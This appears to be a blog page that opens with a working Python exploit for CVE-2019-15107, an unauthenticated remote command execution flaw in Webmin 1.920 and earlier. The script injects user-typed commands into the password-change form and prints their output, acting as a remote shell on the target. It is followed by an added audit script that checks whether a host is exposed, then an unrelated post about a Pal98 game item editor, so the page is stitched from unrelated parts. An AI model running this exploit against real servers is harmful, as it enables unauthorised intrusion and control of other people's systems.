CVE-2019-15107 Webmin RCE <=1.920 (unauthenticated)

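Requirements:

1.  Webmin <=1.920
2.  Webmin -> Webmin Configuration -> Authentication -> Password expiry policy set to "Prompt users with expired passwords to enter a new one". This option is not set by default.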

Github: webmin_CVE-2019-15107

# Exploit Title: Webmin backdoor CVE-2019-15107 (RCE)
# Exploit author : chako
# Date: 2019-12-29
# Software Link: http://www.webmin.com/download.html (Webmin <= 1.920)
# Vuln Reported by: AkkuS 
# Original Post: https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
#                https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15107
#
# "Webmin installation must have Webmin -> Webmin Configuration -> Authentication -> 
# Password expiry policy set to Prompt users with expired passwords to enter a new one. 
# This option is not set by default, but if it is set, it allows remote code execution."
# ---- ( https://www.virtualmin.com/node/66890 )

#!/usr/bin/python
import requests
import sys
import re 

#target = "https://192.168.1.84:10000/password_change.cgi"

if len(sys.argv)>=2:
    target = "https://"+sys.argv[1]+":10000/password_change.cgi"
    cmd = raw_input("Command># ") 
else:
    print "\nUsage: python .\webmin.py [Target IP]\n"
    exit()

while cmd != "exit" :
    client = requests.session()
    requests.packages.urllib3.disable_warnings()
    payload = {'user':'root','pam':'','expired':'2','expired':'2','old':cmd,'new1':'opgg','new2':'opgg'}
    response = client.post(target, verify=False, data=payload,headers=dict(Referer=target))
	
    if response.ok:
        x = re.search("(is incorrect)(.*)<\/h3><\/center>", response.text.encode("utf-8"), flags=re.DOTALL)
        if (x):
            print x.group().replace("</h3></center>","").replace("is incorrect","")
        else:
            print("No match")
    else:
        print "error code --> ",response.status_code

    cmd = raw_input("Command># ")
    print cmd



Reference Links:
https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15107
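
A defender-side check for the two requirements listed at the top of this post, as an added example that is not part of the original post or the exploit. It assumes (not stated on the page) that Webmin stores the policy as `passwd_mode` in `miniserv.conf`, with `2` meaning "Prompt users with expired passwords to enter a new one"; the function names and the sample config are constructed for illustration.

```python
"""Audit a Webmin install for the two preconditions listed in the post."""

AFFECTED_MAX = (1, 920)  # from the page: Webmin <= 1.920
PROMPT_MODE = "2"  # assumption: passwd_mode=2 is the "prompt" policy


def parse_miniserv(text):
    """Parse key=value lines of miniserv.conf; skip blanks and comments."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        conf[key.strip()] = value.strip()
    return conf


def parse_version(text):
    """Turn '1.920' into (1, 920) so versions compare numerically."""
    return tuple(int(part) for part in text.strip().split("."))


def audit(version_text, miniserv_text):
    """Return both checks plus an overall verdict for one host."""
    conf = parse_miniserv(miniserv_text)
    old = parse_version(version_text) <= AFFECTED_MAX
    prompt = conf.get("passwd_mode") == PROMPT_MODE
    return {
        "version_affected": old,
        "prompt_policy_enabled": prompt,
        "exposed": old and prompt,
        "port": conf.get("port", "10000"),
    }


# Constructed sample input, not taken from a real host.
SAMPLE_CONF = """\
port=10000
ssl=1
# password expiry policy
passwd_mode=2
"""

if __name__ == "__main__":
    for version in ("1.920", "1.930"):
        print(version, audit(version, SAMPLE_CONF))
```

On a real host the inputs would be the contents of the Webmin version file and `miniserv.conf`, typically under `/etc/webmin/` (an assumption about the install layout).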

Pal98 Editor

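The Legend of Sword and Fairy (仙劍奇俠傳) was the second computer game I ever played (the first was Wolfenstein 3D).
Back then there was only DOS and we had no computer at home, so I always went to a neighbor's house to play.
Later the company behind the game released the first installment so that players could play it on a PC (if you are interested, take a look here: https://steachs.com/archives/1975 ).
To be honest, I rarely play games and have never played any of the other titles in the series, but I have always loved the first one.

I wrote an item editor that lets you get late-game equipment such as the "無塵劍" (Dustless Sword) and the "金蠶王" (Golden Silkworm King) right from the start.
I hope you all like it.

# Nostalgia # I'm a sentimental person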

Copy Pal98_editor.exe into your Pal98 game folder and run it from there.
You can download Pal98 at https://steachs.com/archives/1975

GitHub: https://github.com/ChakoMoonFish/Pal98_editor